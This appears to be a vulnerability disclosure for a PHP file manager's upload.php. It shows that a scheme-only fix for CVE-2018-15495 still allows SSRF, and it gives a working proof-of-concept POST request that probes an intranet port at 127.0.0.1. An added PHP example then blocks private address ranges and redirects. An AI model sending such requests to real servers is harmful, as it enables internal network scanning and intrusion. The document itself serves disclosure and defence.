In upload.php we can download a picture from a remote server; the code is in lines 68~91.
On Jul 27, 2018 a fix was committed to limit the URL in order to prohibit the SSRF vuln CVE-2018-15495,
but the fix only checks that the param url starts with http:// or https://.
We can still use the http protocol to probe the intranet and attack an intranet server. For example:
```http
POST /filemanager/upload.php HTTP/1.1
Host: localhost
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=9gov40jg57e4bo2olu5rqr8oc0; login=76a61a8504394f9c08ec4d7d747d3377
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 44

fldr=test/&url=http://127.0.0.1:2233/aaaaaaa
```
When the port is open, it will respond with `{"error":"Invalid URL"}`.
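A destination check that goes beyond the scheme prefix described in this report, as an added PHP example that is not the project's code or its fix. The function names are hypothetical, and it assumes the curl extension, 64-bit PHP and IPv4-only resolution (IPv6 hosts are refused).

```php
<?php
// Added example with hypothetical helper names; not the project's own code.
const BLOCKED_CIDRS = ['0.0.0.0/8', '10.0.0.0/8', '100.64.0.0/10', '127.0.0.0/8',
    '169.254.0.0/16', '172.16.0.0/12', '192.168.0.0/16', '224.0.0.0/4', '240.0.0.0/4'];

function ip_is_blocked(string $ip): bool {
    $addr = ip2long($ip);
    if ($addr === false) return true;           // not a dotted-quad IPv4 address: refuse
    foreach (BLOCKED_CIDRS as $cidr) {
        [$net, $bits] = explode('/', $cidr);
        $mask = (-1 << (32 - (int) $bits)) & 0xFFFFFFFF;   // assumes 64-bit PHP
        if (($addr & $mask) === (ip2long($net) & $mask)) return true;
    }
    return false;
}

// Returns [host, port, ip] when every address the host resolves to is public, else null.
function resolve_public_target(string $url): ?array {
    $p = parse_url($url);
    if (!is_array($p) || !isset($p['scheme'], $p['host']) || isset($p['user'])) return null;
    $scheme = strtolower($p['scheme']);
    if (!in_array($scheme, ['http', 'https'], true)) return null;  // scheme check is only the first gate
    $ips = gethostbynamel($p['host']);          // IPv4 only; IPv6 literals fail here and are refused
    if (!$ips) return null;
    foreach ($ips as $ip) {
        if (ip_is_blocked($ip)) return null;    // one internal answer rejects the whole URL
    }
    return [$p['host'], $p['port'] ?? ($scheme === 'https' ? 443 : 80), $ips[0]];
}

function fetch_remote(string $url): ?string {
    $target = resolve_public_target($url);
    if ($target === null) return null;
    [$host, $port, $ip] = $target;
    $ch = curl_init($url);
    curl_setopt_array($ch, [
        CURLOPT_RETURNTRANSFER => true,
        CURLOPT_FOLLOWLOCATION => false,        // a redirect could point back inside
        CURLOPT_PROTOCOLS      => CURLPROTO_HTTP | CURLPROTO_HTTPS,
        CURLOPT_RESOLVE        => ["$host:$port:$ip"],  // connect only to the address that was checked
        CURLOPT_TIMEOUT        => 10,
    ]);
    $body = curl_exec($ch);
    return $body === false ? null : $body;
}

var_dump(fetch_remote('http://127.0.0.1:2233/aaaaaaa'));   // the URL from the request above
```

Returning the same generic failure for every refused or failed fetch also keeps the response from revealing whether an internal port is open.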